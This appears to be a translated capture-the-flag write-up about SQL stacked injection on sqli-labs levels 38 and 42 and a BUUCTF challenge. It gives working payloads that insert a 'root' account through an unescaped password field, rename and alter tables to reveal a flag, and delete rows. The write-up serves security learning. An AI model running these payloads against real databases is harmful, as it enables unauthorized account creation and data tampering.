I did a web question on BUUCTF, which involves stack injection, so let’s learn it.
In SQL statements, the end of the statement always ends with `;`, but if we add another SQL statement after `;`, will the two statements be executed together? This is the cause of stack injection
The simplest statement `select * from users; DELETE FROM test`
Query the user table first, and then delete the user table from the test database.
Let’s conduct actual combat
Shooting range: sql-libs38
First judge the closing point, which is’
Reconstruct the payload:?id=1′ order by 4 %23
Determine the number of columns to be 3 columns
Level 38 can be understood as a blind note, the right or wrong of the second sentence will not be echoed to us
Ok, let’s construct the payload first: `?id=-1′; insert into users(id,username,password) values(88,’aaa’,’bbb’)%23`
But the page is not displayed, let’s go to the database to check
The last line, username: aaa, password: bbb has been successfully inserted into the database
If we add the account and password of the administrator, then what is the result?
This level is not obvious, let’s try level 42
sql-libs-42
Because aaa has been inserted just now, now we directly construct the payload login
①username:ʻaaa’;insert into users(id,username,password) values(60,’root’,’root’)#`
password:`bbb`
I checked the database and found that the addition was not successful, but the statement was correct. Consider filtering the username or other protective measures.
②username:ʻaaa`
password:`bbb’;insert into users(id,username,password) values(60,’root’,’root’)#`
Try to stack the password again
Successful landing
View database
Inserted successfully
Go and look at the source code of level 42
“`
$username = mysqli_real_escape_string($con1, $_POST[“login_user”]);
$password = $_POST[“login_password”];
“`
The username was escaped, but the password was submitted directly in post, which caused stack injection.
Another example
[ 2019] Random injection
Insert picture description here
First judge whether there is an injection point, try 1′
Injection point found
Then determine the number of columns
222222
Use 1’union select 1, database(); #An error occurred
Characters such as select are filtered, normal injection cannot be used, and error injection cannot be used!
Look at the master’s WP try to use stack injection.
We first construct the payload: 1′;show database; #
View database
Construct payload1′ again; show tables; #View several tables
Only two tables
From the two tables, we then query the column
Construct payload: 0′; show columns from words;#
Did not find the flag we wanted
Then construct the payload:
0′;show columns from `1919810931114514`;#
I forgot to add single quotes to the characters before, but I tried n times without success! It was only after adding characters that I realized that my ignorance was terrible and wasted a lot of time! ! !
Find the flag column, the next step is how to make him echo it
In the above picture, we know that regular matching filters many characters, but not alert and rename.
① Change the words table to word1 first
②Rename the 1919810931114514 table to be modified to word
③ Modify the flag field to id
Construct the payload:
0';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#
Should succeed
emmmmm, use 1′;show tables;#
Modified successfully
Access 0’or ‘1’=’1
Get flag
Reviews
There are no reviews yet.